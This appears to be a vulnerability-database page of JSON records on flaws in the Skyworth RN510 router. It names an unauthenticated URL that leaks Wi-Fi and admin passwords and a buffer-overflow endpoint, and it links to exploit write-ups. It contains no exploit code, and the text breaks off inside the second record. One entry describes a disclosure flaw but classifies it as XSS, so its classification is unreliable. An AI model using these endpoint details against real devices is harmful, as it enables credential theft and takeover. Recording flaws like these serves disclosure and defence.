Search criteria

3 vulnerabilities found for rn510 by skyworthdigital

VAR-202104-1681

Vulnerability from variot - Updated: 2025-01-30 20:27

Skyworth Digital Technology RN510 V.3.1.0.4 is affected by an incorrect access control vulnerability in/cgi-bin/test_version.asp. If Wi-Fi is connected but an unauthenticated user visits a URL, the SSID password and web UI password may be disclosed

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202104-1681",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "rn510",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "skyworthdigital",
        "version": "3.1.0.4"
      },
      {
        "model": "rn510",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "skyworth digital holdings",
        "version": null
      },
      {
        "model": "rn510",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "skyworth digital holdings",
        "version": "rn510  firmware  3.1.0.4"
      },
      {
        "model": "digital technology rn510",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "skyworth",
        "version": "v.3.1.0.4"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28366"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005345"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25326"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Kaustubh G. Padwad",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-617"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2021-25326",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 3.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 6.8,
            "id": "CVE-2021-25326",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "LOW",
            "trust": 1.9,
            "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 3.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 6.8,
            "id": "CNVD-2021-28366",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "LOW",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.3,
            "id": "CVE-2021-25326",
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.4,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2021-25326",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "Low",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2021-25326",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2021-25326",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2021-28366",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202104-617",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-25326",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28366"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25326"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005345"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-617"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25326"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Skyworth Digital Technology RN510 V.3.1.0.4 is affected by an incorrect access control vulnerability in/cgi-bin/test_version.asp. If Wi-Fi is connected but an unauthenticated user visits a URL, the SSID password and web UI password may be disclosed",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-25326"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005345"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-28366"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25326"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-25326",
        "trust": 4.0
      },
      {
        "db": "PACKETSTORM",
        "id": "162455",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005345",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-28366",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-617",
        "trust": 0.6
      },
      {
        "db": "OTHER",
        "id": "NONE",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25326",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "OTHER",
        "id": null
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-28366"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25326"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005345"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-617"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25326"
      }
    ]
  },
  "id": "VAR-202104-1681",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "OTHER",
        "id": null
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-28366"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      },
      {
        "category": [
          "network device"
        ],
        "sub_category": "Mesh Wi-Fi router",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "OTHER",
        "id": null
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-28366"
      }
    ]
  },
  "last_update_date": "2025-01-30T20:27:29.455000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top\u00a0Page",
        "trust": 0.8,
        "url": "https://en.skyworthdigital.com/"
      },
      {
        "title": "Skyworth Digital Technology RN510 Fixes for access control error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147351"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005345"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-617"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-352",
        "trust": 1.0
      },
      {
        "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005345"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25326"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.2,
        "url": "http://packetstormsecurity.com/files/162455/shenzhen-skyworth-rn510-information-disclosure.html"
      },
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25326"
      },
      {
        "trust": 1.7,
        "url": "https://s3curityb3ast.github.io/ksa-dev-013.md"
      },
      {
        "trust": 1.7,
        "url": "http://seclists.org/fulldisclosure/2021/may/8"
      },
      {
        "trust": 0.1,
        "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/79.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "OTHER",
        "id": null
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-28366"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25326"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005345"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-617"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25326"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "OTHER",
        "id": null
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-28366"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25326"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005345"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-617"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25326"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-04-15T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-28366"
      },
      {
        "date": "2021-04-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-25326"
      },
      {
        "date": "2021-12-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-005345"
      },
      {
        "date": "2021-04-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-617"
      },
      {
        "date": "2021-04-09T13:15:13.097000",
        "db": "NVD",
        "id": "CVE-2021-25326"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-04-19T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-28366"
      },
      {
        "date": "2021-05-04T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-25326"
      },
      {
        "date": "2021-12-13T06:29:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-005345"
      },
      {
        "date": "2021-08-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-617"
      },
      {
        "date": "2024-11-21T05:54:45.390000",
        "db": "NVD",
        "id": "CVE-2021-25326"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-617"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Skyworth\u00a0Digital\u00a0Technology\u00a0RN510\u00a0 Cross-site Scripting Vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005345"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-617"
      }
    ],
    "trust": 0.6
  }
}

VAR-202104-1683

Vulnerability from variot - Updated: 2024-11-23 22:11

Skyworth Digital Technology RN510 V.3.1.0.4 RN510 V.3.1.0.4 contains a buffer overflow vulnerability in /cgi-bin/app-staticIP.asp. An authenticated attacker can send a specially crafted request to endpoint which can lead to a denial of service (DoS) or possible code execution on the device. RN510 is a dual-band wireless AC2100 access point launched by Skyworth Digital Technology

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202104-1683",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "rn510",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "skyworthdigital",
        "version": "3.1.0.4"
      },
      {
        "model": "rn510",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "skyworth digital holdings",
        "version": null
      },
      {
        "model": "rn510",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "skyworth digital holdings",
        "version": "rn510  firmware  3.1.0.4"
      },
      {
        "model": "digital technology rn510",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "skyworth",
        "version": "v.3.1.0.4"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28367"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005336"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25328"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Kaustubh G. Padwad",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-610"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2021-25328",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "CVE-2021-25328",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2021-28367",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "id": "CVE-2021-25328",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2021-25328",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2021-25328",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2021-25328",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2021-28367",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202104-610",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-25328",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28367"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25328"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005336"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-610"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25328"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Skyworth Digital Technology RN510 V.3.1.0.4 RN510 V.3.1.0.4 contains a buffer overflow vulnerability in /cgi-bin/app-staticIP.asp. An authenticated attacker can send a specially crafted request to endpoint which can lead to a denial of service (DoS) or possible code execution on the device. RN510 is a dual-band wireless AC2100 access point launched by Skyworth Digital Technology",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-25328"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005336"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-28367"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25328"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-25328",
        "trust": 3.9
      },
      {
        "db": "PACKETSTORM",
        "id": "162450",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005336",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-28367",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-610",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25328",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28367"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25328"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005336"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-610"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25328"
      }
    ]
  },
  "id": "VAR-202104-1683",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28367"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28367"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:11:00.232000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top\u00a0Page",
        "trust": 0.8,
        "url": "https://en.skyworthdigital.com/"
      },
      {
        "title": "Patch for Skyworth Digital Technology RN510 buffer overflow vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/259221"
      },
      {
        "title": "Skyworth Digital Technology RN510 Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147346"
      },
      {
        "title": "CVE-2021-25328",
        "trust": 0.1,
        "url": "https://github.com/GoogleProjectZer0/CVE-2021-25328 "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28367"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25328"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005336"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-610"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-120",
        "trust": 1.0
      },
      {
        "problemtype": "Classic buffer overflow (CWE-120) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005336"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25328"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.1,
        "url": "http://packetstormsecurity.com/files/162450/shenzhen-skyworth-rn510-buffer-overflow.html"
      },
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25328"
      },
      {
        "trust": 1.7,
        "url": "https://s3curityb3ast.github.io/ksa-dev-011.md"
      },
      {
        "trust": 1.7,
        "url": "http://seclists.org/fulldisclosure/2021/may/5"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/120.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/googleprojectzer0/cve-2021-25328"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28367"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25328"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005336"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-610"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25328"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28367"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25328"
      },
      {
